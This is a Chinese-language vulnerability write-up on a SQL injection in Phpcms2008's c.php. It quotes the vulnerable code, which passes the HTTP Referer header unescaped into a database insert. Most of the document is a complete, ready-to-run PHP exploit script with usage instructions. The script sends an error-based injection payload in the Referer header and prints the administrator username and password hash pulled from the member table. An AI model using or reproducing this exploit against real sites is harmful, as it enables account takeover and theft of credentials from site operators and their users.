|
漏洞文件/c.php
<?php require './ads/include/common.inc.php';
$id = intval($id); $ads = $c_ads->get_info($id);
if($ads) { $db->query("UPDATE ".DB_PRE."ads SET `clicks`=clicks+1 WHERE adsid=".$ads['adsid']); $info['username'] = $_username; $info['clicktime'] = time(); $info['ip'] = IP; $info['adsid'] = $id; $info['referer'] = HTTP_REFERER;//直接赋值 $year = date('ym',TIME); $table = DB_PRE.'ads_'.$year; $table_status = $db->table_status($table); if(!$table_status) { include MOD_ROOT.'include/create.table.php'; } $db->insert($table, $info);//进行数据库查询 $url = strpos($ads['linkurl'], 'http://')===FALSE ? 'http://'.$ads['linkurl'] : $ads['linkurl']; } ?>
而define('HTTP_REFERER', isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '');
可见我们可以控制HTTP_REFERER,而且不受GPC控制。
$db->insert函数如下: function insert($tablename, $array) { $this->check_fields($tablename, $array); return $this->query("INSERT INTO `$tablename`(`".implode('`,`', array_keys($array))."`) VALUES('".implode("','", $array)."')"); }
下面是exp --------------------begain-------------- <?php
print "\n+------------------------------------------------------+"; print "\n| Phpcms2008 /c.php SQL injection Exploit by qingsh4n |"; print "\n+------------------------------------------------------+\n";
$match = array(); if ($argc < 3) { print "\nUsage......: php $argv[0] host path\n"; print "\nExample....: php $argv[0] localhost /\n"; print "\nExample....: php $argv[0] localhost /phpcms/\n"; die(); } $query_string = $argv[2]."c.php?id=1"; $host = $argv[1]; //$path = ereg_replace("(/){2,}", "/", $argv[2]); print "[+]Exp is posting data!\n"; $return_data = post_request($host, $query_string);
//echo $return_data; //preg_match("/Duplicate entry '~(.*)~(.*)~1' for key/", $return_data, $match); //print_r($a);
if(preg_match("/Duplicate entry '~(.*)~(.*)~1' for key/", $return_data, $match)){ print "[+]It's ok!\n"; print "[+]Usrname is: $match[1]\n"; print "[+]Password is: $match[2]\n"; die("[+]Bye"); } if(preg_match("/Bad Request/", $return_data)){ print "[-]May be error switch off!\n"; die("[-]Bye"); } www. if(preg_match("/Table 'phpcms.phpcms_member' doesn't exist/", $return_data)){ preg_match("/INSERT INTO `(.*)_ads_1211/", $return_data, $match); print "[-]May be database Prefix changed!\n"; print "[-]Database Prefix is: $match[1]\n"; print "[-]Please change payload by yourself!\n"; die("[-]Bye"); }else{ print "[-]May be not affected!\n"; die("[-]Bye"); } function post_request($remote_server, $remote_path, $post_string = "", $port = 80, $timeout = 30){ $payload = "Referer: qingshen'),('','1353245103','121.8.210.25',(select 2 from(select count(*),concat((select (select (select concat(0x7e,phpcms_member.username,0x7e,phpcms_member.password,0x7e) from phpcms_member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)),('admin','1353245103','121.8.210.205','1','qingshen"; $socket = fsockopen($remote_server, $port, $errno, $errstr, $timeout); if (!$socket) die("$errstr($errno)");
fwrite($socket, "GET $remote_path HTTP/1.0\r\n"); fwrite($socket, "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0\r\n"); fwrite($socket, "Host: $remote_server\r\n"); fwrite($socket, "Content-type: application/x-www-form-urlencoded\r\n"); fwrite($socket, "Accept:*/*\r\n"); fwrite($socket, "Referer: $payload\r\n"); fwrite($socket, "\r\n"); $header = ""; while ($str = trim(fgets($socket, 4096))) { $header .= $str; } $data = ""; while (!feof($socket)) { $data .= fgets($socket, 4096); } return $data; } ------------------------end---------------------
|
|
|
